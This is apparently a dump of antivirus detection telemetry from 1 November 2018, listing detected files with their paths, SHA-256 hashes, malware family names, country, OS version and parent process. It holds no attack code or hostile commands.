  Row(detection=Row(filename='avscan-20181101-155614-c42318b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155614-C42318B5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4840650fdc7ebe8d378d5e04174ee310f5f5b2c8444e2ba82743fea27c51f42f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\4840650FDC7EBE8D378D5E04174EE310F5F5B2C8444E2BA82743FEA27C51F42F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4840650fdc7ebe8d378d5e04174ee310f5f5b2c8444e2ba82743fea27c51f42f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4978a9920b1dc099dbee7aeeb8578a279d70946aafe86abeee017959f2a0ca10', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\4978A9920B1DC099DBEE7AEEB8578A279D70946AAFE86ABEEE017959F2A0CA10', filesize=168000, name='WORM/Soltern.oald.#M1.#R1'), hash='4978a9920b1dc099dbee7aeeb8578a279d70946aafe86abeee017959f2a0ca10', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155822-d9a97f8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155822-D9A97F8A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diana asamoah.exe', filepath='\\\\?\\D:\\Diana Asamoah.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:36:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='doct baru.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\NOTULEN MEETING P2K3\\doct baru\\doct baru.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152435-3a67282f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152435-3A67282F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T22:09:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ags0412.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PAGI\\AGS0412\\AGS0412.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='督导汇报(太原、晋中、吕梁).doc', filepath='D:\\督导汇报(太原、晋中、吕梁).doc', filesize=64000, name='HEUR/Macro.VBA5.#M1.#R1'), hash='535ea920fcea2e6070b5f9afb31e059fb704c243a3cf42e3725f4fa99be4a48b', metadata=Row(cmdline='-r', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Tencent\\QQPCMgr\\12.7.18997.207\\QQPCRTP.exe', parentsize=311352, timestamp='2018-11-01T14:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155248-a17aaf19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155248-A17AAF19', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='http:\\\\\\/\\\\\\/www.reimageplus.com\\\\\\/GUI\\\\\\/GUI1880\\\\\\/layout.php?consumer=1&gui_branch=0&trackutil=4139179281&MinorSessionID=6b8e916838a040318122dd809f&lang_code=en&bundle=0  \\\\\\/cil=DISABLED \\\\\\/Close=0 \\\\\\/Locale=1033 \\\\\\/Product:reimage', country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Reimage\\Reimage Repair\\Reimage.exe', parentsize=9124200, timestamp='2018-11-01T09:19:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diana asamoah.exe', filepath='D:\\Diana Asamoah.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:38:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091440-c57c5c42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0325020e\\AVSCAN-20181101-090025-3A08BDB6\\AVSCAN-20181101-091440-C57C5C42', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='16a61ab5efdcec33d71663b07bf20c1347ddc30ee8329c18722b9a75b12e5e08', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:15:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oc48ycqq04ewk20i226skqcu 4wms.2miaukieiey2q0kogeeaagc0ommawggyq', filepath='H:\\\xa0\\oC48ycQQ04EwK20i226skQCU 4wms.2MIAUKIeiEY2q0KOgEeAagc0omMAwgGyQ', filesize=24632000, name='WORM/Taranis.2406.#M0.#R0'), hash='4f57433946394d849c81bc6959550b03bd9acbcd166bc7d8dabbd5d43faffc21', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:36:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T17:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5586395\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_4280006417.exe', parentsize=2593072, timestamp='2018-11-01T11:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111324-0cfdf92d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111324-0CFDF92D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-01T08:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9524944a09910b877b6482cae7dc612265a2c9b46c7eeb5b5b47be9f2dc8041f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\9524944A09910B877B6482CAE7DC612265A2C9B46C7EEB5B5B47BE9F2DC8041F', filesize=1156000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='9524944a09910b877b6482cae7dc612265a2c9b46c7eeb5b5b47be9f2dc8041f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:14:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\營業管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='b053c73a956f5f6eeb0c545ff3d47ba12f9ff21a83ff1ddc2f0e66156e7d37d7', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='75bcc7d8a53ebe6adaaa13ed26da4a6a21ac297e990c7a7dbccaaf3cfc887ea4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\75BCC7D8A53EBE6ADAAA13ED26DA4A6A21AC297E990C7A7DBCCAAF3CFC887EA4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='75bcc7d8a53ebe6adaaa13ed26da4a6a21ac297e990c7a7dbccaaf3cfc887ea4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220848-952a5d50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-220739-8B38A345\\AVSCAN-20181101-220848-952A5D50', filesize=1600000, name='TR/Patched.Ren.Gen4.#M1.#R1'), hash='7c8a842ab8047ece3e5dd6f562fdb8e680c0fb07ff04d3f220a25297cfc9e7f7', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124403-2706329c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8017edc4\\AVSCAN-20181101-124156-178C771B\\AVSCAN-20181101-124403-2706329C', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='d8153cbe750aa7d505ba84c574f9e188fde10a92a400b1d2450b08843a7e1c6f', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182753-ff498e54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_306862dd\\AVSCAN-20181101-182701-F801935C\\AVSCAN-20181101-182753-FF498E54', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8cbbea915dc1325a8c6e542f6353e4d15a75bcc70727c2ac5027112d864f5ee8', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cf2aafb324cba261cc54f550d86acc1efb2706c77901024484d3eeae41c7f043', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\CF2AAFB324CBA261CC54F550D86ACC1EFB2706C77901024484D3EEAE41C7F043', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cf2aafb324cba261cc54f550d86acc1efb2706c77901024484d3eeae41c7f043', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a15377e2c7b7a927667db893fcf0ba5d591b60a764d1dbf81017edc977687a65', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A15377E2C7B7A927667DB893FCF0BA5D591B60A764D1DBF81017EDC977687A65', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a15377e2c7b7a927667db893fcf0ba5d591b60a764d1dbf81017edc977687a65', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\towerpokermpp\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\towerpokermpp\\mppoker.exe', parentsize=1289976, timestamp='2018-11-01T17:13:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110142-b485f6b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110142-B485F6B6', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='support.exe', filepath='C:\\Users\\X\\Documents\\Dota\\support\\support.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 06 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 06 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113559-7b0c2381', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8173745\\AVSCAN-20181101-111512-6E8DC715\\AVSCAN-20181101-113559-7B0C2381', filesize=1952000, name='Adware/Widgi.vqxpa.#M1.#R1'), hash='592b7d066b4a229f997bf6ab2da7137333d44655d716c292bf8a9dfc2f474e57', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='a93c6e2f14110f72f503e021bc7186d735f800284f862a78b972e19066f74c37', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes73\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='cda2c430ab5a662b70c25f640f2ad44194a5dfbc9c98580242508f6cec75209c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='regoffline.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Corel\\CorelDRAW Graphics Suite X4\\Languages\\EN\\Programs\\PCUUI\\regOffline.htm', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='9a221ab5802107c906f59f0d34b2cc0d7460cd4e7e60c5953e559d4bb6abd7aa', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:20:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epson321833eu.exe', filepath='D:\\c\\Mes documents\\downloads\\Programs\\epson321833eu.exe', filesize=13376000, name='W32/Sality.AG.#M1.#R1'), hash='a8fe30c84e9ac4cc4577ef29103bb69db4e3cf4245388b295b09f69d89574c45', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:35:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cdbxp_setup_4.5.0.3717_x64.exe', filepath='\\\\?\\E:\\Stv\\cdbxp_setup_4.5.0.3717_x64.exe', filesize=5444000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='8346b1a405555f136366addd4f342d2be5c07bb5e203a2b0728ea4dd66392803', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:07:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110021-aa491d81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110021-AA491D81', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092441-bbbbfaf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e97d068\\AVSCAN-20181101-092410-B6C41C15\\AVSCAN-20181101-092441-BBBBFAF6', filesize=768000, name='TR/Dropper.Gen.#M1.#R1'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a8fae', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a8fae', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:27:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='09d49a2ba912849e6db2a18405121a2b7b4196fea9cf0d1f3920cbc09b42f47e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\09D49A2BA912849E6DB2A18405121A2B7B4196FEA9CF0D1F3920CBC09B42F47E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09d49a2ba912849e6db2a18405121a2b7b4196fea9cf0d1f3920cbc09b42f47e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:45:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='02da87c6fbb26761177bde9bf5b7c428076a74f0b0a7b48dbe0392d9a30ed95b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\02DA87C6FBB26761177BDE9BF5B7C428076A74F0B0A7B48DBE0392D9A30ED95B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='02da87c6fbb26761177bde9bf5b7c428076a74f0b0a7b48dbe0392d9a30ed95b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:03:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002838-607d96ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002838-607D96EA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e12f2445-2c54-42b7-9128-1c62ced65875.dll', filepath='\\\\?\\C:\\Program Files (x86)\\e46b1b7a-cf11-45d5-8c30-72780a410319\\e12f2445-2c54-42b7-9128-1c62ced65875.dll', filesize=192000, name='HEUR/AGEN.1030354.#M1.#R1'), hash='09f6f48be71cc07cb5dc7f8c32106682eaad612caa2e144882101679113931ce', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:34:01Z'), dt=datetime.date(2018, 11, 1)),
